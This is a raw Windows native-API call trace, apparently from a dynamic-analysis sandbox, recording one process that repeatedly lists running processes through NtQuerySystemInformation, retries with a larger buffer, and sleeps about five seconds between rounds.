0x0 [0153.412] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0153.414] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0153.414] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0153.427] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0153.427] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0153.428] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0153.428] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0153.428] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0153.430] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0153.430] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0153.442] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0153.442] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0153.443] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0153.443] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0153.443] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0153.445] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0153.445] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0153.457] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0153.458] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0153.458] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0153.459] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0153.459] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0153.461] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0153.462] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0153.473] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0153.473] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0153.474] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0153.474] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0153.474] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0153.477] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0153.477] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0153.489] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0153.489] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0153.490] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0153.490] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0153.490] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0153.493] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0153.494] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0153.506] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0153.506] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0153.507] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0153.507] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0153.507] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0153.510] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0153.510] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0153.520] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0153.520] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0153.521] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0153.521] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0153.521] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0153.523] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0153.524] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0153.535] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0153.536] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0153.536] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0153.537] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0153.537] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0153.539] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0153.539] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0153.551] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0153.552] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0153.552] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0153.552] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0153.553] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0153.555] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0153.556] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0153.567] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0153.567] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0153.568] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0153.568] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0153.568] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0153.570] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0153.571] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0153.582] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0153.583] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0153.583] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0153.583] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0153.584] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0153.586] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0153.586] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0153.598] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0153.598] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0153.599] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0153.599] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0153.599] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0153.601] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0153.602] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0153.615] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0153.616] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0153.616] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0153.616] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0153.616] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0153.618] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0153.619] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0153.631] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0153.632] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0153.632] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0153.632] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0153.632] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0153.634] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0153.635] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0153.645] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0153.645] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0153.645] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0153.646] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0153.646] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0153.648] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0153.648] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0153.660] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0153.661] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0153.661] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0153.661] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0153.662] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0153.664] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0153.664] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0153.676] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0153.676] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0153.677] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0153.677] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0153.677] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0153.680] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0153.680] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0153.692] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0153.692] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0153.692] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0153.693] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0153.693] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0153.695] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0153.695] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0153.707] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0153.707] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0153.708] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0153.708] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0153.708] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0153.710] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0153.711] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0153.724] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0153.724] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0153.725] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0153.725] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0153.725] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0153.727] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0153.728] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0153.738] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0153.739] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0153.739] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0153.739] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0153.740] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0153.741] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0153.742] 